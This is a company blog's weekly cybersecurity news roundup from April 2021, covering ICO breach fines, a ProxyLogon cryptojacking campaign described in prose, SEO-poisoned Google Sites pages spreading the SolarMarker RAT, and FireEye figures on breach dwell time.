Search
Close this search box.

Neu Cyber Threats – 22nd April 2021

Table of Contents

[fusion_builder_container type=”flex” hundred_percent=”no” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ background_position=”left top” border_style=”solid” border_position=”all” spacing=”yes” background_repeat=”no-repeat” margin_top=”25px” margin_bottom=”0px” animation_speed=”0.3″ animation_direction=”left” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” center_content=”no” last=”true” hover_type=”none” first=”true” min_height=”” link=””][fusion_text]

Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which, we here at Neuways, bring attention to the latest cybersecurity threats in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:

 

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container type=”flex” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” align_content=”stretch” flex_align_items=”flex-start” flex_justify_content=”flex-start” hundred_percent_height_center_content=”yes” equal_height_columns=”no” container_tag=”div” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” status=”published” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ background_blend_mode=”none” video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” absolute=”off” absolute_devices=”small,medium,large” sticky=”off” sticky_devices=”small-visibility,medium-visibility,large-visibility” sticky_transition_offset=”0″ scroll_offset=”0″ animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” min_height=”” link=””][fusion_imageframe image_id=”159744|full” max_width=”500px” hover_type=”none” borderradius=”8px” align_medium=”none” align_small=”none” align=”none” lightbox=”no” alt=”Neu Cyber Threats” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″]http://neuways.com/wp-content/uploads/2021/10/Neu-Cyber-Threats-ICO.png[/fusion_imageframe][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” min_height=”” link=””][fusion_modal_text_link]

[/fusion_modal_text_link][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

£42m in Data Breach Fines Issued to Businesses in 2020

[/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ align_self=”auto” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).

The largest fine was handed to British Airways with just over half of the £42.41m total being paid by the airline, following a 2018 cyber attack which saw over half a million of its customers’ details stolen by cyber criminals.

The news highlights the need for businesses to improve their data management policies and secure the data they hold correctly. With the COVID-19 pandemic, many companies might have prioritised other areas of their business, forgetting about improvements to their cyber security measures. Read more on the story and what to be aware of, here.

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container type=”flex” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” align_content=”stretch” flex_align_items=”flex-start” flex_justify_content=”flex-start” hundred_percent_height_center_content=”yes” equal_height_columns=”no” container_tag=”div” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” status=”published” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ background_blend_mode=”none” video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” absolute=”off” absolute_devices=”small,medium,large” sticky=”off” sticky_devices=”small-visibility,medium-visibility,large-visibility” sticky_transition_offset=”0″ scroll_offset=”0″ animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ margin_top=”60px”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” min_height=”” link=””][fusion_modal_text_link]

[/fusion_modal_text_link][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

Attackers Target ProxyLogon Exploit to Install Cryptojacker

[/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” min_height=”” link=””][fusion_imageframe image_id=”159203|full” max_width=”800px” hover_type=”none” borderradius=”8px” align_medium=”none” align_small=”none” align=”center” lightbox=”no” alt=”Neu Cyber Threats” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″]http://neuways.com/wp-content/uploads/2021/10/Microsoft-Exchange-scaled.jpeg[/fusion_imageframe][/fusion_builder_column][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ align_self=”auto” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

Microsoft Exchange servers have again been targeted, this time by cyber criminals to host malicious Monero cryptominer in an “unusual attack”. This latest hit to the Exchange servers follows the recent infamous ProxyLogon exploit.

It has been discovered that the threat actors were able to compromise the Exchange servers using the exploit —which suffered a whole range of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to webshells -to host Monero cryptomining malware.

The attack began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.

A script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, before deleting any evidence that it was there. The attack’s executable appears to contain a modified version of a tool publicly available called PEx64-Injector, which is described as having the ability to migrate files without requiring any administrator privileges. Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the system’s files. It configures the miner, injects it into a running process, then exits, with the damage done and running on the system.

Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although, the attacker lost several servers after this date and the overall activity from the miner decreased, other servers that were gained more than made up for the early losses. The ProxyLogon problem started for Microsoft in early March when the company said it has spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange server. The four flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials – giving them access to email communications and the ability to install a web shell for further exploitation within the environment.

While Microsoft have already released an out-of-band update, with the company confirming that 92% of affected machines had been patched, much damage has already been done to businesses whose Exchange servers were affected by the issue, there still will be unpatched systems that remain vulnerable out there.

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container type=”flex” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” align_content=”stretch” flex_align_items=”flex-start” flex_justify_content=”flex-start” hundred_percent_height_center_content=”yes” equal_height_columns=”no” container_tag=”div” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” status=”published” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ background_blend_mode=”none” video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” absolute=”off” absolute_devices=”small,medium,large” sticky=”off” sticky_devices=”small-visibility,medium-visibility,large-visibility” sticky_transition_offset=”0″ scroll_offset=”0″ animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ margin_top=”60px”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” min_height=”” link=””][fusion_modal_text_link]

[/fusion_modal_text_link][fusion_imageframe image_id=”159474|full” max_width=”900px” hover_type=”none” borderradius=”8px” align_medium=”none” align_small=”none” align=”none” lightbox=”no” alt=”Neu Cyber Threats” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″]http://neuways.com/wp-content/uploads/2021/10/Google-Banner-scaled.jpeg[/fusion_imageframe][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

100,000 Google Sites Used to Install SolarMarker RAT

[/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ align_self=”auto” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.

Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.

Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.

Cyber criminals use Google search re-direction and drive-by-download tactics to direct unsuspecting victims to the RAT— typically a person who visits the infected site simply executes a binary disguised as a PDF by clicking on a purported “form” — thus infecting his or her machine. This is an increasingly common trend with malware delivery, which speaks to the improved security of applications such as browsers that handle vulnerable code. Unfortunately, it reveals a glaring blind spot in controls, which allows users to execute untrusted binaries or script files at will.

The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.

One recent incident was observed by researchers, in which a victim working in the financial industry was searching for a free version of a document online and was re-directed via Google Search to a Google sites page that was under the control of threat actors and included an embedded download button. It’s clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.

Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.

Neuways advises employees to consider what type of business forms, invoices, receipts etc, they use search for online. Through sharing this type of form on a centralised system such as Microsoft SharePoint, colleagues can share documents such as this, and avoid falling into sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or hello@neuways.com to discuss your options with us.

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container type=”flex” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” align_content=”stretch” flex_align_items=”flex-start” flex_justify_content=”flex-start” hundred_percent_height_center_content=”yes” equal_height_columns=”no” container_tag=”div” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” status=”published” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ background_blend_mode=”none” video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” absolute=”off” absolute_devices=”small,medium,large” sticky=”off” sticky_devices=”small-visibility,medium-visibility,large-visibility” sticky_transition_offset=”0″ scroll_offset=”0″ animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ margin_top=”60px”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

Breaches Detected Faster, But Ransomware Surge a Major Factor: FireEye

[/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ align_self=”center” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” min_height=”” link=””][fusion_modal_text_link]

[/fusion_modal_text_link][fusion_imageframe image_id=”159242|full” max_width=”600px” hover_type=”none” borderradius=”8px” align_medium=”none” align_small=”none” align=”center” lightbox=”no” alt=”Neu Cyber Threats” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″]http://neuways.com/wp-content/uploads/2021/10/Ransomware-Neu-Cyber-Threats.jpg[/fusion_imageframe][/fusion_builder_column][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ align_self=”auto” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ margin_bottom=”0px” hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

Recent data has shown that the time it takes businesses to detect a malicious attack continues to drop and it’s mostly due to companies becoming better at detecting cyber attacks.

Data show that organisations are also getting better at detecting intrusions on their own but that the massive increase in ransomware attacks was another factor. Ransomware attacks are typically detected quickly since the attackers often make their presence known when they demand a ransom, after they have encrypted the victim’s files and/or have stolen the victim’s data.

In the ransomware attacks investigated by researchers, 78% had a dwell time of 30 days or less, and only 1% of these incidents had a dwell time of 700 days or more. As previously mentioned this could be due to the ease in which ransomware attacks can be operated. Rather than placing all of their eggs in one basket (or one cyber attack), cyber criminals can instead attack thousands of businesses all at once. 59% of the breaches investigated globally during this period were detected internally, while in comparison to 2019, 47% were discovered internally. The number of days an attacker is present in the target’s environment before they are discovered – the ‘dwell time’ – also decreased significantly in 2020 compared to the previous year, from 56 days to 24 days. In the case of external breach notifications, the median dwell time in 2020 was 73 days, while in the case of internal detection the dwell time was only 12 days.

